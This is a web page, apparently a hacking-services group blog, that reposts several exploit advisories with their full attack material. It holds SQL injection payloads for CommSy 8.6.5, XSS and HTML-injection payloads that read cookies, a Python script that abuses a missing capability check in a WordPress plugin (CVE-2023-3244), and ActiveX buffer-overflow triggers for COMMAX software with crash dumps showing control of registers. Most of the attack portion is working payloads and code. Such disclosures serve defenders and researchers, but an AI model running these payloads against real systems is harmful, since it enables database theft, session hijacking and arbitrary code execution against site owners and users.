Title:
======
CommSy 8.6.5 - SQL injection
Researcher:
===========
Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
CVE-ID:
=======
CVE-2019-11880
Timeline:
=========
2019-04-15 Vulnerability discovered
2019-04-15 Asked for security contact and PGP key
2019-04-16 Send details to the vendor
2019-05-07 Flaw was approved but will not be fixed in branch 8.6
2019-05-15 Public disclosure
Affected Products:
==================
CommSy <= 8.6.5
Vendor Homepage:
================
https://www.commsy.net
Details:
========
CommSy is a web-based community system, originally developed at the
University of Hamburg, Germany, to support learning/working communities.
We have discovered a unauthenticated SQL injection vulnerability in
CommSy <= 8.6.5 that makes it possible to read all database content. The
vulnerability exists in the HTTP GET parameter "cid".
Proof of Concept:
=================
boolean-based blind:
commsy.php?cid=101" AND 3823=(SELECT (CASE WHEN (3823=3823) THEN 3823
ELSE (SELECT 7548 UNION SELECT 4498) END))-- dGRD&mod=context&fct=login
error-based:
commsy.php?cid=101" AND (SELECT 6105 FROM(SELECT
COUNT(*),CONCAT(0x716a767871,(SELECT
(ELT(6105=6105,1))),0x716b6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jzQs&mod=context&fct=login
time-based blind:
commsy.php?cid=101" AND SLEEP(5)-- MjJM&mod=context&fct=login
Fix:
====
According to the manufacturer, the version branch 8.6 is no longer
supported and the vulnerability will not be fixed. Customers should
update to the newest version 9.2.
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863141532
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/49296/info
Real Estate Script is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
"/></a></><img src=1.gif onerror=alert(1)>
# Exploit Title: POC-CVE-2023-3244
# Date: 9/12/2023
# Exploit Author: Diaa Hanna
# Software Link: [download link if available]
# Version: <= 1.2.0 comments-like-dislike
# Tested on: 1.1.6 comments-like-dislike
# CVE : CVE-2023-3244
#References
#https://nvd.nist.gov/vuln/detail/CVE-2023-3244
#The Comments Like Dislike plugin for WordPress has been found to have a vulnerability that allows unauthorized modification of data. This vulnerability arises due to a missing capability check on the restore_settings function, which is called through an AJAX action. The vulnerability affects versions up to and including 1.2.0 of the plugin.
#This security flaw enables authenticated attackers with minimal permissions, such as subscribers, to reset the plugin's settings. It's important to note that this issue was only partially patched in version 1.2.0, as the nonce (a security measure) is still accessible to subscriber-level users.
#For more detailed information about this bug, you can refer to the National Vulnerability Database (NVD) website at [CVE-2023-3244](https://nvd.nist.gov/vuln/detail/CVE-2023-3244).
import requests
import argparse
import sys
from colorama import Fore
parser = argparse.ArgumentParser(prog='POC-CVE-2023-3244',description='This is a proof of concept for the CVE-2023-3244 it is an access control vulnerability in the restore_settings function ')
parser.add_argument('-u','--username',help='username of a user on wordpress with low privileges',required=True)
parser.add_argument('-p',"--password",help='password of a user on wordpress with low privileges',required=True)
parser.add_argument('--url',help='the url of the vulnerable server (with http or https)',required=True)
parser.add_argument('--nossl',help='disable ssl verification',action='store_true',required=False,default=False)
args=parser.parse_args()
#check if the domain ends with a '/' if not then add it
url=args.url
if url[-1] != '/':
url+='/'
wp_login = f'{url}wp-login.php'
wp_admin = f'{url}wp-admin/'
username = args.username
password = args.password
session=requests.Session()
#logging in
session.post(wp_login, headers={'Cookie':'wordpress_test_cookie=WP Cookie check'}, data={'log':username, 'pwd':password, 'wp-submit':'Log In',
'redirect_to':wp_admin, 'testcookie':'1' },verify=not (args.nossl))
#if failed to login
if len(session.cookies.get_dict()) == 2:
print(Fore.RED +"Error Logging In Check Your Username and Password And Try Again")
sys.exit(1)
#making the ajax request to wp_ajax_cld_settings_restore_action this line will call the restore_settings function
#the restore_settings function does not check the sufficient privileges of a logged-in user
#even a subscriber can use this POC
response=session.get(f"{wp_admin}/admin-ajax.php?action=cld_settings_restore_action",verify=not (args.nossl))
if response.text == "Settings restored successfully.Redirecting...":
print(Fore.GREEN +"exploited excuted successfully")
print(Fore.YELLOW+ "settings of the comments-like-dislike plugin should be defaulted on the server")
sys.exit(0)
else:
print(Fore.RED + "some error occurred please read the source code of the poc it isn't that long anyway")
sys.exit(1)
source: https://www.securityfocus.com/bid/54111/info
Commentics is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Commentics 2.0 is vulnerable; prior versions may also be affected.
http://www.example.com/commentics/commentics/comments/[admin_path]/index.php?p age=edit_page&id="><script>alert(1)</script><!--
# Exploit Title: Comment System 1.0 - 'multiple' Stored Cross-Site Scripting
# Date: 2021-02-18
# Exploit Author: Pintu Solanki
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14713/comment-system-phpmysqli-full-source-code.html
# Software: : Comment System 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
# Vulnerable Page: http://localhost/comment/index.php
# Vulnerable Input Field :
Your Name: "><script>alert(document.cookie)</script>
Comment: "><script>alert(document.cookie)</script>
# Payload used:
"><script>alert(document.cookie)</script>
# POC: Whenever we will go to the page (http://localhost/comment/index.php) where the script is injected, the stored script will be executed.
# You will see your Javascript code (XSS) executed.
# Exploit Title: COMMAX WebViewer ActiveX Control 2.1.4.5 - 'Commax_WebViewer.ocx' Buffer Overflow
# Date: 02.08.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.commax.com
COMMAX WebViewer ActiveX Control 2.1.4.5 (Commax_WebViewer.ocx) Buffer Overflow
Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: 2.1.4.5
Summary: COMMAX activex web viewer client (32bit) for COMMAX DVR/NVR.
Desc: The vulnerability is caused due to a boundary error in the
processing of user input, which can be exploited to cause a buffer
overflow when a user inserts overly long array of string bytes
through several functions. Successful exploitation could allow
execution of arbitrary code on the affected node.
Tested on: Microsoft Windows 10 Home (64bit) EN
Microsoft Internet Explorer 20H2
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5663
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5663.php
02.08.2021
--
$ python
>>> "A"*1000 [ToTheClipboard]
>>>#Paste in ID or anywhere
(5220.5b30): Access violation - code c0000005 (!!! second chance !!!)
wow64!Wow64pNotifyDebugger+0x19918:
00007ff9`deb0b530 c644242001 mov byte ptr [rsp+20h],1 ss:00000000`0c47de00=00
0:038> g
(5220.5b30): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for CNC_Ctrl.DLL -
CNC_Ctrl!DllUnregisterServer+0xf5501:
0b4d43bf f3aa rep stos byte ptr es:[edi]
0:038:x86> r
eax=00000000 ebx=00002000 ecx=0000000f edx=00000000 esi=41414141 edi=41414141
eip=0b4d43bf esp=0d78f920 ebp=0d78f930 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
CNC_Ctrl!DllUnregisterServer+0xf5501:
0b4d43bf f3aa rep stos byte ptr es:[edi]
0:038:x86> !exchain
0d78fac4: CNC_Ctrl!DllUnregisterServer+eca92 (0b4cb950)
0d78fb74: ntdll_76f80000!_except_handler4+0 (76ffad20)
CRT scope 0, filter: ntdll_76f80000!__RtlUserThreadStart+3cdb7 (77024806)
func: ntdll_76f80000!__RtlUserThreadStart+3ce50 (7702489f)
0d78fb8c: ntdll_76f80000!FinalExceptionHandlerPad25+0 (77008a29)
Invalid exception stack at ffffffff
0:038:x86> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501
01 0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c
02 0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67
03 0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7
0:038:x86> d esp
0d78f920 0f 00 00 00 00 00 00 00-dc 2e ff 76 78 c5 7e 0b ...........vx.~.
0d78f930 b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00 ..~..]@.AAAA....
0d78f940 00 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00 . ......x.~.....
0d78f950 10 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00 .^.u%.@...x. ...
0d78f960 00 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00 .i.a..x.........
0d78f970 10 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76 ..........x.W(.v
0d78f980 70 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76 p:...........(.v
0d78f990 00 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00 ............t...
0:038:x86> d ebp
0d78f930 b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00 ..~..]@.AAAA....
0d78f940 00 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00 . ......x.~.....
0d78f950 10 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00 .^.u%.@...x. ...
0d78f960 00 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00 .i.a..x.........
0d78f970 10 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76 ..........x.W(.v
0d78f980 70 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76 p:...........(.v
0d78f990 00 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00 ............t...
0d78f9a0 8c 0c 00 00 88 0e 00 00-8c 0e 00 00 b8 0d 00 00 ................
0:038:x86> d esi
41414141 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
41414151 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
41414161 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
41414171 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
41414181 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
41414191 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
414141a1 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
414141b1 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
0:038:x86> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
*** ERROR: Symbol file could not be found. Defaulted to export symbols for ie_to_edge_bho.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for Commax_WebViewer.OCX -
GetUrlPageData2 (WinHttp) failed: 12002.
DUMP_CLASS: 2
DUMP_QUALIFIER: 0
FAULTING_IP:
CNC_Ctrl!DllUnregisterServer+f5501
0b4d43bf f3aa rep stos byte ptr es:[edi]
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 0b4d43bf (CNC_Ctrl!DllUnregisterServer+0x000f5501)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 41414141
Attempt to write to address 41414141
FAULTING_THREAD: 00005b30
DEFAULT_BUCKET_ID: INVALID_POINTER_WRITE
PROCESS_NAME: IEXPLORE.EXE
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 00000001
EXCEPTION_PARAMETER2: 41414141
FOLLOWUP_IP:
CNC_Ctrl!DllUnregisterServer+f5501
0b4d43bf f3aa rep stos byte ptr es:[edi]
WRITE_ADDRESS: 41414141
WATSON_BKT_PROCSTAMP: 95286d96
WATSON_BKT_PROCVER: 11.0.19041.1
PROCESS_VER_PRODUCT: Internet Explorer
WATSON_BKT_MODULE: CNC_Ctrl.DLL
WATSON_BKT_MODSTAMP: 547ed821
WATSON_BKT_MODOFFSET: 1043bf
WATSON_BKT_MODVER: 1.7.0.2
MODULE_VER_PRODUCT: CNC_Ctrl Module
BUILD_VERSION_STRING: 10.0.19041.1023 (WinBuild.160101.0800)
MODLIST_WITH_TSCHKSUM_HASH: aadfa1c5bdd8f77b979f6a5b222994db450b715e
MODLIST_SHA1_HASH: 849cfdbdcb18d5749dc41f313fc544a643772db9
NTGLOBALFLAG: 0
PROCESS_BAM_CURRENT_THROTTLED: 0
PROCESS_BAM_PREVIOUS_THROTTLED: 0
APPLICATION_VERIFIER_FLAGS: 0
PRODUCT_TYPE: 1
SUITE_MASK: 784
DUMP_TYPE: fe
ANALYSIS_SESSION_HOST: LAB17
ANALYSIS_SESSION_TIME: 08-12-2021 14:20:11.0116
ANALYSIS_VERSION: 10.0.16299.91 amd64fre
THREAD_ATTRIBUTES:
OS_LOCALE: ENU
PROBLEM_CLASSES:
ID: [0n301]
Type: [@ACCESS_VIOLATION]
Class: Addendum
Scope: BUCKET_ID
Name: Omit
Data: Omit
PID: [Unspecified]
TID: [0x5b30]
Frame: [0] : CNC_Ctrl!DllUnregisterServer
ID: [0n274]
Type: [INVALID_POINTER_WRITE]
Class: Primary
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [Unspecified]
TID: [0x5b30]
Frame: [0] : CNC_Ctrl!DllUnregisterServer
ID: [0n152]
Type: [ZEROED_STACK]
Class: Addendum
Scope: BUCKET_ID
Name: Add
Data: Omit
PID: [0x5220]
TID: [0x5b30]
Frame: [0] : CNC_Ctrl!DllUnregisterServer
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK
PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT
LAST_CONTROL_TRANSFER: from 0b405dea to 0b4d43bf
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501
0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c
0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67
0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7
THREAD_SHA1_HASH_MOD_FUNC: e84e62df4095d241971250198ae18de0797cfdc7
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 2033316a7c1a92aaeab1ce97e013350953fef546
THREAD_SHA1_HASH_MOD: 6d850af928076b326edbcafdf6dd4f771aafbab5
FAULT_INSTR_CODE: 458baaf3
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: CNC_Ctrl!DllUnregisterServer+f5501
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: CNC_Ctrl
IMAGE_NAME: CNC_Ctrl.DLL
DEBUG_FLR_IMAGE_TIMESTAMP: 547ed821
STACK_COMMAND: ~38s ; .cxr ; kb
FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_CNC_Ctrl.DLL!DllUnregisterServer
BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_CNC_Ctrl!DllUnregisterServer+f5501
FAILURE_EXCEPTION_CODE: c0000005
FAILURE_IMAGE_NAME: CNC_Ctrl.DLL
BUCKET_ID_IMAGE_STR: CNC_Ctrl.DLL
FAILURE_MODULE_NAME: CNC_Ctrl
BUCKET_ID_MODULE_STR: CNC_Ctrl
FAILURE_FUNCTION_NAME: DllUnregisterServer
BUCKET_ID_FUNCTION_STR: DllUnregisterServer
BUCKET_ID_OFFSET: f5501
BUCKET_ID_MODTIMEDATESTAMP: 547ed821
BUCKET_ID_MODCHECKSUM: 357a4b
BUCKET_ID_MODVER_STR: 1.7.0.2
BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_
FAILURE_PROBLEM_CLASS: APPLICATION_FAULT
FAILURE_SYMBOL_NAME: CNC_Ctrl.DLL!DllUnregisterServer
WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/IEXPLORE.EXE/11.0.19041.1/95286d96/CNC_Ctrl.DLL/1.7.0.2/547ed821/c0000005/001043bf.htm?Retriage=1
TARGET_TIME: 2021-08-12T12:21:50.000Z
OSBUILD: 19042
OSSERVICEPACK: 1023
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
OSEDITION: Windows 10 WinNt SingleUserTS Personal
USER_LCID: 0
OSBUILD_TIMESTAMP: unknown_date
BUILDDATESTAMP_STR: 160101.0800
BUILDLAB_STR: WinBuild
BUILDOSVER_STR: 10.0.19041.1023
ANALYSIS_SESSION_ELAPSED_TIME: 1d869
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:invalid_pointer_write_c0000005_cnc_ctrl.dll!dllunregisterserver
FAILURE_ID_HASH: {5e1e375a-c411-e928-cd64-b7f6c07eea3b}
Followup: MachineOwner
---------
# Exploit Title: COMMAX UMS Client ActiveX Control 1.7.0.2 - 'CNC_Ctrl.dll' Heap Buffer Overflow
# Date: 02.08.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.commax.com
COMMAX UMS Client ActiveX Control 1.7.0.2 (CNC_Ctrl.dll) Heap Buffer Overflow
Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: 1.7.0.2
Summary: COMMAX activex web viewer UMS client (32bit) for COMMAX
DVR/NVR.
Desc: The vulnerability is caused due to a boundary error in the
processing of user input, which can be exploited to cause a heap
based buffer overflow when a user inserts overly long array of
string bytes through several functions. Successful exploitation
could allow execution of arbitrary code on the affected node.
Tested on: Microsoft Windows 10 Home (64bit) EN
Microsoft Internet Explorer 20H2
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5664
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5664.php
02.08.2021
--
<!-- functions: rtsp_forceconnect_login() and rtsp_connect_login() -->
<!-- parameters: user_id, user_pwd and rtsp_addr -->
<html>
<object classid='clsid:3D6F2DBA-F4E5-40A6-8725-E99BC96CC23A' id='cel' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\CNC_CTRL.dll"
prototype = "Function rtsp_forceconnect_login ( ByVal user_id As String , ByVal user_pwd As String , ByVal rtsp_addr As String , ByVal rtsp_port As Long , ByVal rtp_proto As Long , ByVal device As Long , ByVal islive As Long , ByVal ch As Long ) As Long"
memberName = "rtsp_forceconnect_login"
progid = "CNC_CTRLLib.UMS_Ctrl"
argCount = 8
arga=String(2510, "C")
argb=String(2510, "B")
argc=String(2510, "A")
argd=1
arge=1
argf=1
argg=1
argh=1
cel.rtsp_forceconnect_login arga ,argb ,argc ,argd ,arge ,argf ,argg ,argh
</script>
</html>
==
(5b1c.59e8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for CNC_Ctrl.DLL -
CNC_Ctrl!DllUnregisterServer+0x19e34:
10028cf2 83a1d412000000 and dword ptr [ecx+12D4h],0 ds:002b:000012d4=????????
0:000:x86> r
eax=00000001 ebx=10119db8 ecx=00000000 edx=81ff6f2e esi=058c0048 edi=00000001
eip=10028cf2 esp=030fcf10 ebp=030fe33c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
CNC_Ctrl!DllUnregisterServer+0x19e34:
10028cf2 83a1d412000000 and dword ptr [ecx+12D4h],0 ds:002b:000012d4=????????
0:000:x86> !exchain
030feab4: 41414141
Invalid exception stack at 41414141
0:000:x86> d esp
030fcf10 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
030fcf20 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
030fcf30 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
030fcf40 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
030fcf50 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
030fcf60 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
030fcf70 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
030fcf80 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0:000:x86> d ebp
030fe33c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
030fe34c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
030fe35c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
030fe36c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
030fe37c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
030fe38c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
030fe39c 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
030fe3ac 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
0:000:x86> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
GetUrlPageData2 (WinHttp) failed: 12002.
DUMP_CLASS: 2
DUMP_QUALIFIER: 0
FAULTING_IP:
CNC_Ctrl!DllUnregisterServer+18ee3
10027da1 8999d4120000 mov dword ptr [ecx+12D4h],ebx
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 10027da1 (CNC_Ctrl!DllUnregisterServer+0x00018ee3)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 000012d4
Attempt to write to address 000012d4
FAULTING_THREAD: 000056a4
DEFAULT_BUCKET_ID: INVALID_POINTER_WRITE
PROCESS_NAME: wscript.exe
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 00000001
EXCEPTION_PARAMETER2: 000012d4
FOLLOWUP_IP:
CNC_Ctrl!DllUnregisterServer+18ee3
10027da1 8999d4120000 mov dword ptr [ecx+12D4h],ebx
WRITE_ADDRESS: 000012d4
WATSON_BKT_PROCSTAMP: 7159f3df
WATSON_BKT_PROCVER: 5.812.10240.16384
PROCESS_VER_PRODUCT: Microsoft ® Windows Script Host
WATSON_BKT_MODULE: CNC_Ctrl.DLL
WATSON_BKT_MODSTAMP: 547ed821
WATSON_BKT_MODOFFSET: 27da1
WATSON_BKT_MODVER: 1.7.0.2
MODULE_VER_PRODUCT: CNC_Ctrl Module
BUILD_VERSION_STRING: 10.0.19041.1023 (WinBuild.160101.0800)
MODLIST_WITH_TSCHKSUM_HASH: d459299c6b0ff5b482d41c6445b84a3447c0171e
MODLIST_SHA1_HASH: 18e8e8c8cdd4f9db5369e6ca934fd1b74bcb19c1
NTGLOBALFLAG: 0
PROCESS_BAM_CURRENT_THROTTLED: 0
PROCESS_BAM_PREVIOUS_THROTTLED: 0
APPLICATION_VERIFIER_FLAGS: 0
PRODUCT_TYPE: 1
SUITE_MASK: 784
DUMP_TYPE: fe
ANALYSIS_SESSION_HOST: LAB17
ANALYSIS_SESSION_TIME: 08-12-2021 13:37:16.0907
ANALYSIS_VERSION: 10.0.16299.91 amd64fre
THREAD_ATTRIBUTES:
OS_LOCALE: ENU
PROBLEM_CLASSES:
ID: [0n301]
Type: [@ACCESS_VIOLATION]
Class: Addendum
Scope: BUCKET_ID
Name: Omit
Data: Omit
PID: [Unspecified]
TID: [0x56a4]
Frame: [0] : CNC_Ctrl!DllUnregisterServer
ID: [0n274]
Type: [INVALID_POINTER_WRITE]
Class: Primary
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [Unspecified]
TID: [0x56a4]
Frame: [0] : CNC_Ctrl!DllUnregisterServer
ID: [0n152]
Type: [ZEROED_STACK]
Class: Addendum
Scope: BUCKET_ID
Name: Add
Data: Omit
PID: [0x56e4]
TID: [0x56a4]
Frame: [0] : CNC_Ctrl!DllUnregisterServer
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK
PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT
IP_ON_HEAP: 61616161
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.
IP_IN_FREE_BLOCK: 61616161
FRAME_ONE_INVALID: 1
LAST_CONTROL_TRANSFER: from 61616161 to 10027da1
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
00afe294 61616161 61616161 61616161 61616161 CNC_Ctrl!DllUnregisterServer+0x18ee3
00afe298 61616161 61616161 61616161 61616161 0x61616161
00afe29c 61616161 61616161 61616161 61616161 0x61616161
00afe2a0 61616161 61616161 61616161 61616161 0x61616161
00afe2a4 61616161 61616161 61616161 61616161 0x61616161
00afe2a8 61616161 61616161 61616161 61616161 0x61616161
00afe2ac 61616161 61616161 61616161 61616161 0x61616161
00afe2b0 61616161 61616161 61616161 61616161 0x61616161
00afe2b4 61616161 61616161 61616161 61616161 0x61616161
00afe2b8 61616161 61616161 61616161 61616161 0x61616161
00afe2bc 61616161 61616161 61616161 61616161 0x61616161
00afe2c0 61616161 61616161 61616161 61616161 0x61616161
00afe2c4 61616161 61616161 61616161 61616161 0x61616161
00afe2c8 61616161 61616161 61616161 61616161 0x61616161
00afe2cc 61616161 61616161 61616161 61616161 0x61616161
00afe2d0 61616161 61616161 61616161 61616161 0x61616161
00afe2d4 61616161 61616161 61616161 61616161 0x61616161
00afe2d8 61616161 61616161 61616161 61616161 0x61616161
00afe2dc 61616161 61616161 61616161 61616161 0x61616161
00afe2e0 61616161 61616161 61616161 61616161 0x61616161
00afe2e4 61616161 61616161 61616161 61616161 0x61616161
00afe2e8 61616161 61616161 61616161 61616161 0x61616161
00afe2ec 61616161 61616161 61616161 61616161 0x61616161
00afe2f0 61616161 61616161 61616161 61616161 0x61616161
00afe2f4 61616161 61616161 61616161 61616161 0x61616161
00afe2f8 61616161 61616161 61616161 61616161 0x61616161
00afe2fc 61616161 61616161 61616161 61616161 0x61616161
00afe300 61616161 61616161 61616161 61616161 0x61616161
00afe304 61616161 61616161 61616161 61616161 0x61616161
00afe308 61616161 61616161 61616161 61616161 0x61616161
00afe30c 61616161 61616161 61616161 61616161 0x61616161
00afe310 61616161 61616161 61616161 61616161 0x61616161
00afe314 61616161 61616161 61616161 61616161 0x61616161
00afe318 61616161 61616161 61616161 41414141 0x61616161
00afe31c 61616161 61616161 41414141 41414141 0x61616161
00afe320 61616161 41414141 41414141 41414141 0x61616161
00afe324 41414141 41414141 41414141 41414141 0x61616161
00afe328 41414141 41414141 41414141 41414141 0x41414141
00afe32c 41414141 41414141 41414141 41414141 0x41414141
00afe330 41414141 41414141 41414141 41414141 0x41414141
00afe334 41414141 41414141 41414141 41414141 0x41414141
00afe338 41414141 41414141 41414141 41414141 0x41414141
00afe33c 41414141 41414141 41414141 41414141 0x41414141
00afe340 41414141 41414141 41414141 41414141 0x41414141
00afe344 41414141 41414141 41414141 41414141 0x41414141
00afe348 41414141 41414141 41414141 41414141 0x41414141
00afe34c 41414141 41414141 41414141 41414141 0x41414141
00afe350 41414141 41414141 41414141 41414141 0x41414141
00afe354 41414141 41414141 41414141 41414141 0x41414141
00afe358 41414141 41414141 41414141 41414141 0x41414141
00afe35c 41414141 41414141 41414141 41414141 0x41414141
00afe360 41414141 41414141 41414141 41414141 0x41414141
00afe364 41414141 41414141 41414141 41414141 0x41414141
00afe368 41414141 41414141 41414141 41414141 0x41414141
00afe36c 41414141 41414141 41414141 41414141 0x41414141
00afe370 41414141 41414141 41414141 41414141 0x41414141
00afe374 41414141 41414141 41414141 41414141 0x41414141
00afe378 41414141 41414141 41414141 41414141 0x41414141
00afe37c 41414141 41414141 41414141 41414141 0x41414141
00afe380 41414141 41414141 41414141 41414141 0x41414141
